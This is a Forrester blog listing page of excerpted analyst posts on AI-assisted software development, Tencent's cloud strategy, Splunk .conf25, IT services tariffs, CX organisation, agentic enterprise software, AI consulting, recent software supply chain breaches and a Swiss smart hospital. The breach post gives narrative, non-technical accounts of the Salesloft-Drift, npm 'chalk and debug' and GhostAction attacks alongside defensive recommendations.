Forrester

​​Don’t Fire Your Developers! What AI-Enhanced Software Development Means For Technology Executives​

You’ve heard the stories. “More than a quarter of all new code at Google is generated by AI,” boasts Sundar Pichai. “Twenty or thirty percent of [Microsoft’s] code … is written by software,” Satya Nadella proclaims. At the same time, companies seem to be freezing hiring — or outright firing — their developers. All of this has led you to a severe case of AI SDLC FOMO.  The reality? After analyzing Forrester’s survey data, reviewing hundreds of guidance sessions and inquiries, conducting 17 interviews, and building on the foundation by expert analysts such as Diego Lo Giudice, in no conversation did I find technology leaders say they were looking to fire their developers. Instead, what I found was equal parts interest and ignorance, promise, and trepidation.  You Shouldn’t Oversimplify The SDLC  There is no doubt that the willingness to leverage AI for software development is high. In Forrester’s Developer Survey, 2025, using AI and genAI is a top objective by developers (right alongside improving software security and using more open source). At the same time, tech leaders told me that they were challenged by notions that the SDLC is considered a single process by their peers.   For one, adoption rates for AI-enhanced assistants and agents (what Forrester refers to as TuringBots) vary in different stages of the SDLC. This is largely based on process and tool maturity. Coding is farther ahead in most organizations than, for example, analysis and planning.    Further, efficiency increases also vary based on SDLC phase. Intesa Sanpaolo, a leading bank in Europe, saw a 40% increased efficiency gain in test design, but saw 30% in development (including unit testing), and 15% in requirements gathering and analysis.   This story — different gains in different areas of the SDLC with different adoption rates (even across different applications at the same company) — was echoed by many others I talked to. The reality: there is no one-size-fits-all approach to applying AI to the SDLC, and we need to stop thinking of it as a single process that can be swallowed up by a single agent. The ROI Conundrum — You Can’t Justify What You Don’t Measure Correctly Many technology leaders that Forrester speaks to are well past the honeymoon stage when it comes to AI investments. Experiments went well (or faltered) — now is the time to scale. However, we continue to get questions in software development that show a lack of maturity. “How many lines of code should be written per day?” is not a valid KPI, whether you’re measuring a real person or an AI agent. Instead, you need to focus on the metrics that matter: progress, such as velocity and rework trends; quality, such as production defects and deployment failures; efficiency, such as throughput and flow; and engagement, such as developer experience. All of these lead to business value. How do we onboard customers faster with new features? What is the impact on our Net Promoter Score℠ from a low-quality change? How do we improve revenue through more efficient integration with core systems?   These are baseline questions you need to answer before your implementation of AI tools. Too many people I spoke to are trying to do it after. If you have difficulty calculating these metrics, value stream management solutions can help do the job for you.  Getting Past Trust Concerns  While there were concerns early on about AI tools in the SDLC accidently leveraging a competitor’s code — or worse, that your IP would be consumed into someone else’s model — these are largely unfounded. We found that adoption rates in highly regulated verticals such as financial services and government are moving nearly as fast as companies that dove into AI headfirst.  To speed things up further, some enterprises are leveraging past experiences applying AI to other areas of their company to streamline adoption. They are also addressing IP theft with knowledge and technical solutions: Many of today’s solutions can be trained on your own codebase, and — if you are truly concerned — you can run some solutions on-premises. This can alleviate concerns of your legal and risk management teams and avoid adoption deadlock.  Hold On To Your Developers, But You Must Reskill Them  Perhaps most tellingly, the people I spoke to saw a future for developers — but a different kind of “developer.” Architectural skills and business domain come to the forefront. (In other words: vibe coding is cool, but vibe engineering is way cooler). As AI improves, technical knowledge about writing code ceases in importance. Instead, multiagent workflows will force developers to become agent orchestrators: They will navigate agentic choruses far more than the individual songs they’re used to singing. We are already starting to see this with more mature organizations. As for entry-level developers? I admit we see challenges here. Some I spoke to felt AI could provide ongoing training to new talent, but most disagreed. Instead, there was a consensus that tribal knowledge was still king, and the best way to share that knowledge is with veteran developers on your team. Essentially, veteran conductors become veteran teachers.  Moving Toward The Agentic SDLC  I would argue we stand on the precipice of the biggest change to software development since the up-leveling from assembly to higher level languages. Yes, even bigger than the advent of cloud-native development. Entire processes of analyzing, planning, designing, building, testing, and delivering software are being augmented.   But that’s the key word: augmented.   Until the day comes that we can fully trust AI agents to deliver critical, production-level software across a wide spectrum of business use cases, there will be a need for developers. Coders — who take requirements, write code, and pass their work onto the next phase of the SDLC, will die. Developers — who understand the business impact of their work and reshape the SDLC as they see fit — will thrive.  For a great deal more detail, please read my new report “Don’t Fire Your Developers! What AI-Enhanced Software Development Means For Technology

​​Don’t Fire Your Developers! What AI-Enhanced Software Development Means For Technology Executives​ Read More »

A Tale Of Two Engines: Meet The New Tencent

At the fifth Tencent Cloud International Summit, as part of the company’s wider Global Digital Ecosystem Summit in Shenzhen, Tencent made its strategic direction clear: It is accelerating two engines to drive future growth. First, AI is positioned as the intelligent engine, enabling productivity and innovation across industries. Second, globalization serves as the expansion engine, bringing Tencent Cloud’s advanced capabilities to enterprises worldwide through localized, sovereign infrastructure; compliance; and strategic partnerships. These dual priorities signal Tencent’s ambition to evolve from a domestic cloud leader into a global AI-cloud platform provider that helps businesses innovate faster while meeting critical requirements for digital sovereignty and ecosystem integration. AI: From Model Race To Usable Agentic And Physical AI Chinese cloud leaders are pivoting from headline model benchmarks to production‑grade, agent‑driven AI that plugs directly into enterprise workflows and sovereignty‑ready stacks. Tencent casts this pivot as an intelligent engine and opens its AI capabilities via Tencent Cloud so customers can turn AI from concept into measurable productivity. The company paired model advances with toolchains for development, deployment, observability, and governance. This signals a pragmatic phase focused on cost, reliability, and integration into SaaS and data estates rather than one‑off demos. Major announcements on AI include: Agentic stack, end to end. Tencent introduced its Agent Development Platform (ADP) to accelerate real‑world agent building with large language model and retrieval-augmented automation, workflow, and multiagent patterns. The new Agent Runtime provides five core capabilities: execution engine, cloud sandbox, gateway, context, and observability with enterprise readiness. For example, its sandbox is able to start in about 100 milliseconds and scale to hundreds of thousands of concurrent agents. Cloudmate, an expert service agent, has reportedly intercepted 95% of risky SQL and cut troubleshooting from 30 hours to about 3 minutes in internal practice, directly addressing the reliability and operations debt concerns that stall AI in production. Agentic AI at scale for usability. Tencent embedded agentic AI features into its collaboration and AIOps software Yuanbao. Its generative AI chatbot now connects with Tencent Meeting, Tencent Docs, and other apps. Tencent Meeting added real‑time AI minutes, driving a 150% year-over-year increase in AI users. LeXiang Knowledge Base supports 102 content formats with reported 92% QA accuracy, and CodeBuddy fuses product‑to‑deployment workflows such that about 50% of new internal code at Tencent is AI‑generated, with coding time falling by 40%. The throughline is “usable AI” that multiplies throughput in meetings, knowledge retrieval, legal review, and software delivery without forcing teams to switch tools. Foundation model upgrades for 3D. Transformer architecture is driving next-generation advances in computer vision. Diffusion Transformer (DiT), a new class of generative models, combines diffusion models with transformer architecture, taking this evolution to the next level. The Hunyuan3D 3.0 foundation model adopts a hierarchical sculpting approach for 3D‑DiT to improve modeling accuracy and geometric resolution, marking a significant advancement in 3D modeling technology. Over the past year, Hunyuan released more than 30 models and embraced open source; downloads of the 3D series surpassed 2.6 million, pointing to strong developer uptake for digital twins, gaming assets, and immersive commerce. Tairos platform ecosystem for embodied intelligence. Tencent unveiled Tairos, its embodied intelligence platform, marking its entry into the physical AI domain. Tairos acts as the “AI brain” for humanoid robots and other embodied systems, offering robotics developers advanced perception, motion planning, and human‑machine interaction capabilities. The platform integrates simulation environments, cloud‑based control, and large‑model reasoning to accelerate robotics development. By working with leading humanoid vendors — such as AgiBot, KEENON, and Unitree — Tencent’s robotic offering has the potential to enable industries such as manufacturing, logistics, and services to deploy intelligent, adaptive machines at scale. Globalization: From Infrastructure Expansion To Sovereign Cloud Chinese tech vendors have built comprehensive solutions and practices for tech self-reliance in the last decade during the ongoing geopolitical frictions with the US; now, expanded geopolitical tensions are placing digital sovereignty at center stage for enterprises worldwide. The next phase of globalization among Chinese vendors is to apply these experiences overseas systematically: building regional infrastructure, aligning with local compliance, packaging operational playbooks, and serving through partner‑led motions. Tencent’s globalization engine upgrades its offerings across infrastructure, products, and services. Overseas clients can adopt full-stack cloud and AI on local terms, with regional data handling and support to meet sector‑specific needs. Major moves include: A two-pronged global expansion strategy. Abroad, the company operates a dual strategy: powering Chinese giants like NIO and Honor, as well as leading gaming firms as they expand internationally, while simultaneously partnering with local companies such as Japan’s Vector to create region-specific solutions. In Japan, Tencent Cloud enabled Vector to develop AI-generated avatar campaigns crafted specifically for Japanese cultural preferences. This two-pronged approach positions Tencent as both a bridge for Chinese digital expansion and a catalyst for local innovation abroad. Success depends on mastering four critical factors: partnership depth, brand trust, culturally attuned execution, and sales velocity. Execute well on both fronts, and Tencent will become an essential platform for digital transformation, whether companies are going global or local. Footprint and edge acceleration. Tencent is setting aside US$150 million for its first Middle Eastern data center in Saudi Arabia and a third Japanese facility in Osaka (plus a new office) while maintaining nine global technical support centers across APAC, Europe, and the US. At the edge, EdgeOne Pages ties large models to MCP Servers so developers can stand up a complete localized e‑commerce presence, including registration, payments, acceleration, and security, all in minutes. Tencent says the service surpassed 100,000 users in three months, signaling demand for AI‑accelerated, locality‑aware web operations. International product line upgrades. Tencent Cloud delivered globalized editions of ADP, CodeBuddy, Cloud Mall (omnichannel commerce), Starry Sea servers, TDSQL databases, Tencent Cloud Enterprise (TCE), and the EdgeOne accelerated security platform. The stated goal is compatibility with mainstream global stacks and developer tooling, lowering integration effort and compliance frictions for customers that run heterogeneous environments. For builders, these releases mean faster agent development, secure deployment at the edge, and smoother data residency controls. It will turn Tencent’s domestic

A Tale Of Two Engines: Meet The New Tencent Read More »

Splunk .conf25: Cisco, AI, And Data

The 10th annual Splunk .conf took place in Boston, Massachusetts, this year, a refreshing change from the heat and slot machines of Las Vegas. The change in venue didn’t seem to affect the event’s turnout, as Splunk’s Boss of the SOC (BOTS), its Capture the Flag competition, had even more attendees than the previous year by a large margin. There were many comments this year about how, between BOTS and some of the announcements, this was a return to the Splunk of old — a big compliment given how many people have been holding their breath for three years now over Cisco’s acquisition of Splunk. The opening keynote, delivered by Cisco Chief Product Officer Jeetu Patel, emphasized the importance of AI and machine data in the future of Splunk, referring to data as the essential fuel for AI. Machine data at “ludicrous scale” was a consistent theme throughout the conference. Some of Splunk’s key announcements included the Cisco Data Fabric and its Machine Data Lake. The Cisco Data Fabric is its new way of describing the data journey, from traditional Splunk ingest to federated search (such as on Snowflake, which it also announced) and analytics to its new Machine Data Lake. The Machine Data Lake is a cost-effective way to store data within Splunk, allowing data to be promoted to Splunk for easier and faster search and analytics. Importantly, Machine Data Lake sits below both Splunk ES and Observability, so data is effectively shared and can be promoted to either instance as needed. Cisco also announced its AI Canvas, which provides a more widgetlike experience to interact with the AI assistant. This is an interesting approach to better visualize the AI assistant’s outputs, which can help teams operationalize and interact with the data more effectively. It uses deterministic and nondeterministic methods to present relevant content in the most appropriate widget and then highlights linked elements in other existing widgets on the canvas. Enterprise Security 8.2 Is Live — The Rest Is Alpha Generally available capabilities were few and far between beyond ES 8.2, but there were a few especially interesting up-and-coming security announcements: A new approach to packaging: Enterprise Security Essentials, which includes SIEM and the AI assistant; Enterprise Security Premier, which includes SIEM, the AI assistant, SOAR, UBA, and threat intel management. As of the conference, this is in controlled availability. Detection Studio: based on the Snap Attack acquisition, will give detection engineers better visibility and understanding of their detections, including version control. It will be available in January 2026. An AI agent for script analysis: the Malware Reversal Agent, which is available now. An AI agent for triage (alpha in Jan 2026), AI SOAR playbook authoring (alpha in Nov 2025), and the ability to customize the AI capabilities to SOPs are coming. Five GB per day free ingestion of Cisco firewall logs into Splunk: which is valuable and could motivate some to switch more firewall capabilities over to Cisco. Five GB per day in an enterprise setting doesn’t go very far, however, especially with firewall data. Observability Was All The Rage, But Context Is Still King Splunk has not lost its focus on delivering observability capabilities and is expanding them into additional areas. The vendor seeks to evolve observability by extending its reach to data and AI agents and infrastructure to drive what it calls agentic observability. The objective is to deliver unified observability to enable enterprises to demonstrate business impact and improve their ability to fix and prevent issues with AI agents. APM support for hybrid applications and business transactions in observability cloud is a key component. Keynote announcements such as those about Data Fabric, Snowflake integration, Machine Data Lake, and the Time Series Foundational Model demonstrated that Splunk recognizes the importance to enterprises of improving digital resilience and compressing investigation and detection times. The timeline, however, on some of these releases is well into the future. Some features are scheduled for an alpha release in Feb. 2026, which will not sit well with some clients as competing platforms already deliver these offerings. The importance of context across the enterprise was a consistent message from senior Splunk leadership. In reference to the Snowflake integration and supporting open formats, Kamal Hathi, SVP and GM of Splunk, stated that “it gives great business context for many of the operational use cases.” AIOps and observability, which are increasingly dependent on agentic AI, can only achieve their objectives if they have full contextual awareness. Splunk appears to be in tune with this and is working to make these capabilities generally available starting in October but with some only being targeted for alpha releases in February of 2026. Splunk Pushes Forward With Its Data Platform Enhancements Overall, .conf demonstrated that Cisco is heavily focused on leveraging Splunk to support Data Fabric and its AI message while still backing Splunk’s open ecosystem message and large, engaged community. Now with the acquisition fully behind it, Splunk has the opportunity to turn up the pressure on competitors with the full backing of Cisco’s resources and experience. Forrester clients can schedule an inquiry or guidance session to break down the security and observability announcements. There is also an upcoming opportunity to connect with Forrester analysts (and your peers) in person: the Forrester Technology & Innovation Summit from November 2–5 or Security & Risk Summit from November 5–7. Both events are packed with visionary keynotes, informative breakout sessions, interactive workshops, insightful roundtables, and other special programs to help you master risk and conquer chaos. Join us in Austin, Texas — we can’t wait to see you there! source

Splunk .conf25: Cisco, AI, And Data Read More »

US Tariffs and IT Services: Prepare Your Organization For A Range Of Outcomes

When was the last time you saw someone on a unicycle trying to juggle a few bottles? Have you ever tried it? Sure, looks impossible, right? This is a familiar sight for technology leaders because that is the nature of their everyday existence. Deploying new capabilities? Managing cyber threats? Project running over budget? Just lost one of your highest performers to another company? Just another day that ends in “Y”. Now, thanks to the possibility of US tariffs on outsourced IT services, IT leaders have a whole new concern. And it’s a big one. Before you proceed, please check out my colleague Linda Ivy-Rosser’s blog on the HIRE Act which has been introduced in the US Senate. If you have limited time, she is much smarter than me anyway, so I’d start there. IT service providers are a critical part of most CIO teams, used for many purposes: production support, staff augmentation for projects, a strategic implementation partner for major software implementations, business analysis, etc. The list goes on to the tune of multiple million dollars. What are US IT leaders supposed to do now in case tariffs happen either by an act of Congress or an Executive Order? Use Scenario Planning to Minimize Your Impact While you cannot 100% be prepared for all possible outcomes, it is helpful to be ready for a range of uncertainty. Forrester frames this approach through three different scenarios: Baseline, Pessimistic, Optimistic. In all scenarios, preservation of your most strategic investments is paramount and should be secured quickly. Let’s examine each in this context: Baseline: Tariffs are introduced at a baseline amount of 10%, consistent with the introduction of baseline tariffs on products implemented earlier this year. In this scenario, cost increases are modest across the board but likely still require some adjustments. Partner closely with your procurement team to evaluate where your highest impacts are and the net effect on your overall budget. Pessimistic: Tariffs are steep and wide, impacting costs at a substantial level that will cripple most current year financials. Additionally, future year planning will mean a meaningful reduction in the amount of money available for strategic investments. In this worst-case scenario, keeping the lights on will dominate the budget and your AI, tech debt remediation, and new feature development will slow dramatically. Leaders will need to quickly evaluate exit strategies from service providers and not only the financial impact of doing so, but the impact on workload for employees who have to pick up new work. Optimistic: After an initial tariff implementation, negotiations with the US Administration proceed quickly toward another outcome that causes an extended pause in the tariffs, similar to what happened with Mexico and Canada earlier this year. In this scenario, it is not guaranteed that the tariffs will stay paused, however, IT leaders have more time to adequately prepare for the impact and make the necessary staffing or budget adjustments to mitigate impact.   Engage Your Stakeholders Now for Maximum Alignment Regardless of which scenario plays out, your first immediate step needs to be an agreement with your stakeholders on how the company will collectively respond. IT leaders cannot manage these impacts alone nor should they try. Here are a set of concrete actions to gain alignment on before the tariffs hit: Agree on your most important investments and protect them. If you are this close to deploying a game-changing Agentic solution, make sure this continues. Ruthlessly prioritize everything else. Utilize a value-based approach to prioritizing the rest of your investments list, draw a “cut” line for each scenario listed above, and gain agreement with your stakeholders on the execution plan so you are ready to go when the time is right. Tap into pre-allocated vendor funding. Consulting delivery firms can serve as the conduit for firms to tap into several funding mechanisms offered by major cloud hyperscalers (AWS, Microsoft Azure, Google Cloud) as well as the hardware platform providers to accelerate customer adoption and reduce the cost of delivery. Migration and modernization funds are also common, providing rebates or credits to offset the cost of moving workloads to the cloud or re-platforming legacy applications. In addition, firms can leverage marketing development funds (MDF) that consulting partners can use for joint go-to-market campaigns, events, or solution accelerators. Finally, there are training and enablement grants that help upskill delivery teams and customers with cloud-native technologies. Combined, these funding mechanisms allow consulting firms to de-risk projects for customers, increase win rates, and build repeatable, scalable offerings. Prepare a communication plan for your organization. Any of these scenarios will result in changes for the organization. This will bring about uncertainty among the staff as inevitably some projects may be delayed or cancelled, causing employees to worry for their jobs. Use Forrester’s change management research to help your staff navigate through these impacts. The implementation of these potential tariffs could be one of the biggest changes to hit your organization in recent memory. Are you ready? If not, schedule time with one of our analysts to help you get ready. If you think you are ready, still schedule time with us to review your plans. We may find something you missed and/or provide a second set of eyes for reassurance you’ve thought of everything. source

US Tariffs and IT Services: Prepare Your Organization For A Range Of Outcomes Read More »

It’s Time To Talk About Where Your CX Function Should Sit

For years, I’ve gotten the same question fairly regularly: “Where should my CX function sit?” And for years, I’ve given the same answer: “It depends.” Between my own experience leading a CX function and working with literally hundreds of CX leaders around the world, I have yet to encounter one cookie-cutter template that makes sense as the place to put a CX function. Now, roughly two years after kicking off a project to answer this question more definitively, I’m happy to say that our report, Where Your CX Function Should Sit, has confirmed that the right answer really is: “It depends.” So that begs the question: “What does it depend on?” But answering that requires even more nuance than answering the first question. We identified multiple factors and variables that influence the best possible home for the CX function. For example: The express train to the C-suite may derail the CX function. Reporting directly to the CEO sounds great in theory, particularly when the CEO understands that improving CX leads to better business benefits (regardless of whether the organization is in the private sector or the public sector). But if the CEO doesn’t have bandwidth for another direct report or isn’t on board with CX, then the increased visibility without sufficient executive support will lead to failure. The CX leader is a big part of the equation. Since not every CX function can (or should) be at the top of the org chart, the CX leader’s ability to build advocates and allies is a critical success factor. While this may seem like “soft” power, having friends willing to provide information, funding, or project staffing can lead to very real outcomes. The CX function may not stay in the same place forever. Businesses are dynamic: Strategies change, executives leave and get replaced, and org charts get shuffled. So while it may make sense for the CX function to report to Executive A today, some change may make it more logical for it to report to Executive B tomorrow. We reviewed data from multiple global surveys and interviewed dozens of CX leaders and strategy consultancies in order to identify key variables that lead to high-performing and successful CX functions. Using that as a base, we developed a workshop-in-a-box to enable Forrester clients’ own voyages of discovery. This decision-support tool asks the client to consider the organization’s level of customer obsession, what matters most to the organization’s customers, and the traits of leaders best positioned to align CX with what matters the most. This is not a calculator that will spit out a single, perfect answer after checking a few boxes. Its output is a prioritized list of potential executive sponsors that can be approached to gauge their interest in providing a home for the CX function. Because things can change, this workshop-in-a-box is designed for leaders looking to establish a new or rebooted CX function, as well as those aiming to validate an existing CX function’s home. Where do you go from here? If you’re a Forrester client, start by reading the report. Then, either reach out for a guidance session to discuss your specific questions or jump straight to the workshop-in-a-box. We can also do the workshop side by side with clients through a strategy session (for VIP seat holders only), initiative workshop, or Forrester Consulting. If you’re not yet a client, please reach out to our sales team! This was a highly collaborative research project that involved analysts and researchers from across many of Forrester’s research teams. I’d like to thank the following for their contributions: Alex Schanne, Dipanjan Chatterjee, Su Doyle, Shar VanBoskirk, Katy Tynan, Dave Frankland, David Johnson, Colleen Fazio, Fiona Mark, Christina McAllister, Shari Srebnick, and Camille Floyd. source

It’s Time To Talk About Where Your CX Function Should Sit Read More »

The Agentic Business Fabric Is How AI Will Transform Enterprise Applications

The discussion around the agentic future of enterprise software is stuck on the promise of tech adoption. We’re debating the ideas — which large language models to use, how to build agents, and the merits of various data fabric architectures — as if, once embraced, you’re on the way to success. While important, these conversations miss the point and distract from how these elements will fundamentally change the way business operates. We see organizations making massive tech investments that will ultimately fail to deliver value. Why? Because they’re treating this as a silver-bullet solution: It isn’t. The transition to an agentic business fabric future is fundamentally a reinvention of your operating model. Using AI enterprise platforms for internal operations to do what you already do faster is good. Using AI to do things you haven’t done before is better. Success hinges on organizational and commercial shifts in business strategy. What’s The Agentic Business Fabric? The agentic business fabric is an intelligent ecosystem where AI agents, your data, and your employees work together to achieve business outcomes. Instead of users navigating a dozen applications, the fabric orchestrates the necessary capabilities behind the scenes. The goal is to manage the integration of business workflows and make technology invisible, allowing your teams to focus on strategic work, not complex software.   Stop Focusing On “What Agents Do” — Focus On “How They Decide” Most leaders think about how AI will change existing workflows; high-performing enterprises are already redesigning job descriptions. As agents absorb routine tasks, the value of human employees shifts from “doing the work” to supervising the system. Your future MVPs will be AI supervisors and process optimizers. These roles require deep domain expertise and data literacy. Are you actively defining these roles with HR? Are you building training programs to upskill your best people? If you wait, your workforce will be unprepared for the new operational reality. Your Commercial Models Are Now Obsolete Finally, recognize the new vendor power play. Vendors are using AI urgency to end discounts and reset commercial terms. They sell premium-priced tools, but according to our research, the value is unlocked by your investment in process redesign, not the software. This means the burden of success and most of the cost falls on you. Organizations that fail to build architectural flexibility and financial discipline will find themselves locked into expensive platforms that deliver only theoretical benefits. Strategic Control Is The Real Challenge This AI era centers on whether you’ll maintain strategic control over your digital destiny or surrender it. Leveraging the agentic business fabric requires a coalition of technology, business, finance, and HR leaders. Investing in the functional capabilities is the easy part; transforming how your business operates and captures new forms of value is the real challenge. FAQs Q: What’s the main barrier to successful AI functional implementations? A: The primary barrier isn’t technology but a lack of a clear operating model. Success requires redesigning jobs, achieving semantic alignment on business data, and creating new commercial models before deploying AI tools. Q: How does an agentic fabric differ from traditional enterprise software? A: Traditional software requires humans to navigate multiple applications to complete a process. An agentic fabric orchestrates the work behind the scenes, allowing users to focus on outcomes and exceptions rather than manual data entry and process management. Next Steps To dive deeper into the architectural and strategic shifts required, read our new report, The Agentic Business Fabric: AI’s Architectural Transformation Of Business Applications. To pressure-test your own strategy, schedule a guidance session with us and we can discuss your operating model for the agentic era. source

The Agentic Business Fabric Is How AI Will Transform Enterprise Applications Read More »

The Future Of AI Consulting Services Is Disruptively Bright

Despite what you may have read in the media, consulting is not being entirely consumed by artificial intelligence. Yes, the economic paradox of professional services in the AI computing era is that business and technology consultants can use AI-powered delivery platforms to do more work at lower cost. That puts pressure on service provider margins, reduces the need for more headcount, and forces a reconciliation between what enterprise buyers need and what service providers have historically offered. Meanwhile, CIOs are drowning in AI consulting pitches, from management consulting and Big Four accounting providers promising transformation magic to boutique players claiming AI-native superiority. The noise is deafening and the stakes couldn’t be higher, as every company must reinvent its processes and business model in the AI computing era. As I take on responsibility for the Forrester Wave™ covering AI consulting services in 2026, and as part of a services analysis team with decades of experience with management consultancies and technology service providers, it’s a good time to state some positions. Providers will have to: Reprice services, because they can do more work at lower cost. This is the short-term effect. Service providers have been through this before in the transition to offshore labor arbitrage and cloud computing. They will do it again, automating more work, establishing deeper co-innovation with alliance partners, and building more assets to improve services and outcomes. They will alter their staffing structures, invest more in platforms, and change their pricing and risk models, including more value-based and shared-risk commercial models. They will also charge explicitly for or bundle in the cost of their assets as part of the new commercial value proposition. Invest more in alliance relationships and co-innovation capabilities. AI consulting service providers have expanded their relationships with hyperscalers, software giants, data platform builders, hardware OEMs, and now NVIDIA. This allows them to get early access to technology, build new solution architectures, (presumably) learn how the technology works before taking it to clients, and take advantage of tech providers’ subsidized delivery dollars. Together with the AI technical service providers, the AI consulting service providers have joined an expanded AI computing ecosystem as solution orchestrators. Build practices to address an expanding array of AI scenarios. We are in the early years of a 15-year transition to AI-powered business. The scenarios for AI-powered business continue to expand. Most scenarios today have focused on internal operating models and technology readiness. The scenarios of tomorrow will focus on customer engagement and products and services that generate revenue. Firms will turn to consulting services for help designing and migrating to AI + human business processes, establishing AI-native business and customer engagement models, and building new roles in AI-powered value chains. Rethink their hiring, development, and organizational models. The death of the pyramid has been pundit fodder for a decade. New structures are proposed every day: diamond-shaped as AI takes over entry-level work, podlike as AI + human delivery shares the load between people and AI machinery, and so on. New entrants into AI business consulting are bringing AI-first value propositions to consulting services and will put pressure on the major consultancies to revamp their approaches. Consultancies still need a talent pipeline to develop the next generation of expertise and establish deeper client relationships, but they also need an expanded portfolio of baseline skills to develop new industry, technical, and client knowledge; build platforms for delivery and operations; and invest in next-generation AI computing architectures. Modify their economic models to share more risk. Consultancies have gotten a free ride on risk, using the motivation of expertise and customer satisfaction as their guideposts for success. Nobody blacklisted a consultancy for giving them bad advice — they just didn’t hire them again. We see this changing. Management consultancies have already moved toward putting their fees at risk (using outcome-based pricing, for example). We see this expanding as enterprises negotiate with their AI consulting service providers to put some skin in the game — and be compensated for taking on that risk. Put their proprietary knowledge and expertise to work. What do AI consulting service providers bring if not proprietary knowledge and expertise? One of the lessons the major consulting providers have already learned is that their proprietary industry, domain, data, knowledge, and code libraries are valuable assets that turn generic foundation models into decent agentic applications. They will invest much more in proprietary knowledge and build offerings and services around that. All this speaks to a healthy, if different, AI consulting services ecosystem ahead. If you are a Forrester client seeking counsel on AI consulting services, please reach out. If you are an AI consulting service provider, I’m happy to learn more about your practices, your assets, your customers, and your commercial approach to helping clients. source

The Future Of AI Consulting Services Is Disruptively Bright Read More »

School Is In Session, And Attackers Are Grading Your Software Supply Chain Security

Software supply chain attacks continue to be a top external attack vector for attackers to breach enterprises, government agencies, and even personal cryptocurrency wallets. Three recently revealed attacks are a reminder of how attackers probe for any weakness in a supply chain, including smaller entities, to target larger enterprises. Learn from these attacks to strengthen your supply chains or expose yourself to the same. Salesloft-Salesforce The Salesloft-Salesforce breach is the most sophisticated and has had the biggest impact. In this attack, threat actors compromised Salesloft’s Drift customers and Salesforce customer accounts. Over 700 companies have been affected. The software supply chain weakness. The breach originated with attackers accessing the Salesloft GitHub account and code repositories. Attackers then accessed the Drift AWS environment. From AWS, attackers obtained authorization tokens for Drift customers’ technology integrations, including Salesforce, which were in turn used to exfiltrate data from Salesforce customer environments. Separately, attackers utilized other Drift integrations to compromise other enterprises. Forrester’s more comprehensive breakdown is here. What the attackers did. The attackers accessed sensitive data from numerous accounts, including well-respected cybersecurity vendors such as CyberArk, Proofpoint, Tenable, and Zscaler. The exposed customer-sensitive data included IP addresses, account information, access tokens, customer contact data, and business records such as sales pipeline. The attackers exploited cleartext storage of sensitive information within Salesforce support case notes, which were intended to facilitate customer support but provided critical data for hackers. The impact. The attack showed that attackers can pivot from one application (Drift) into other integrations such as Salesforce, accessing customer environments and making this a third- and fourth-tier supply chain attack. Chalk And Debug “chalk and debug” was named after two of the 18 open-source Node Package Manager (NPM) packages that were compromised on September 8. The supply chain weakness. The attackers started with a targeted phishing campaign to open-source maintainers of popular NPM packages to steal credentials. The attackers used the stolen credentials to lock out developers from their NPM accounts and publish new versions of the popular packages with malicious code embedded. Josh Junon (NPM account name “qix”), one of the compromised maintainers, posted to social messaging sites that he had been hacked and had reached out to NPM maintainers to assist in rectifying the issue. The malware itself was a browser-based interceptor that captures and alters network traffic and browser app functions by injecting itself into key processes, such as data-fetching functions and wallet interfaces, to manipulate requests and responses. The attackers did a good job of disguising the payment details, redirecting to an attacker-controlled destination. To the user, it appears that the crypto transaction was completed successfully until the user realizes that the crypto did not reach the intended location. What the attackers did. The attackers went through the trouble to obfuscate the malicious code. In addition, the social engineering aspect of the incident was convincing. The email from “[email protected]” asked the developer to reset their two-factor authentication (2FA) credentials. The link in the email redirected to what appeared to be a legit NPM website. Unknowingly, the developer provided their legitimate credentials to the attacker-owned site and would not realize the compromise until they tried to login back into their NPM account. The researchers at JFrog, a security company, noticed that other maintainers had also been victim to the same phishing campaign and that additional NPM packages were compromised and began notifying maintainers. The impact. Overall, 2.5 million compromised package versions have been downloaded. Researchers at Arkham, a blockchain analytics platform, were able to trace the crypto transactions in the attackers’ wallet, which, as of this past Thursday morning, was only at $1,048.36. The window between the NPM account compromise, the maintainer realizing that they were impacted, and the online reporting by cybersecurity research teams was short, which helped to mitigate the overall attack. In addition, the attackers compromised multiple packages and maintainers, which was unlikely to go unnoticed. Also, thankfully, the malware required that a crypto transaction be initiated in the user’s browser versus just collecting more information that could have been used to move laterally within an organization for a bigger payday. GhostAction Campaign In the “GhostAction” campaign, over 3,325 secrets were stolen across 817 GitHub repositories, affecting 327 users. The software supply chain weakness. Attackers were able to push what appeared to be an innocuous commit titled “Add GitHub Actions Security workflow” to GitHub repositories both public and private. When the GitHub action was triggered, secrets were exfiltrated and sent to an attacker-controlled domain. What the attackers did. Attackers did their homework. They reviewed repositories to see what secrets were in use and only exfiltrated the most impactful ones to stay under the radar. How attackers were able to access GitHub user accounts was not disclosed. Possibly, users fell prey to a social engineering campaign, as was the case in the chalk and debug campaign, or perhaps user credentials or tokens were stolen or leaked online. Another possible scenario is that the GitHub user account may not have been using 2FA and was reusing a password or subject to credential stuffing. This is unlikely, however, as GiHub enforces 2FA on GitHub.com for most contributing users. The impact. A potpourri of secrets was exfiltrated, including Docker Hub credentials, GitHub personal access tokens, AWS access keys, NPM tokens, and database credentials. According to GitGurdian, which initially reported the attack, secrets were being actively exploited. The good news is that no open-source packages appeared to be compromised, but several NPM and PyPI projects were deemed at risk. Take Action Now To Secure Your Software Supply Chain These attacks prove that all software utilized by your organization, even software as a service, is a security risk. Maintainers of popular open-source packages, compromised GitHub user accounts, and malicious code in open-source packages are just the latest examples of software supply chain weaknesses. Don’t wait for the next attack. Instead: Get visibility into your software supply chain. Before you can secure the software supply chain, you first need to have an understanding of what

School Is In Session, And Attackers Are Grading Your Software Supply Chain Security Read More »

Guided By Empathy: How Smart Hospitals Innovate While Staying Patient-Centric

A hospital’s physical infrastructure is often outdated and incompatible with digital technologies, sustainability goals, and easy navigation. Many hospitals feel sterile, with bare walls and mazelike layouts, while hallways overflow with misplaced beds, IV poles, and diagnostic machines. It’s not unusual for patients and family members to get lost. Even basic processes such as food, laundry, and medicine delivery can slow operations and create confusion. My Visit To A Smart Hospital As a former practicing clinician, I’ve walked the halls of many hospitals — but none quite like Baden Cantonal Hospital (KSB) in Switzerland. During my recent visit, I saw firsthand how KSB is changing the narrative as it transforms into an intelligent healthcare organization (IHO). Built over a decade, the facility consolidated 13 floors of operations into three, creating a streamlined, digitally enabled environment that redefines what modern care delivery can look like. Here are some of the things that stood out to me: Healing architecture. With soothing colors, natural wood finishes, escalators in high-traffic areas, and natural light in almost every room, KSB’s design choices are intended to promote warmth and healing. Human-centric design. Patient units follow an open concept. There aren’t doors or separate corridors for different specialties, allowing staff to engage in cross-functional teamwork and communication. KSB installed bedside terminals that let patients charge devices, control lighting, and interact with care teams. Digital infrastructure. KSB integrated a centralized lab system. It uses automated vehicles for food delivery, has 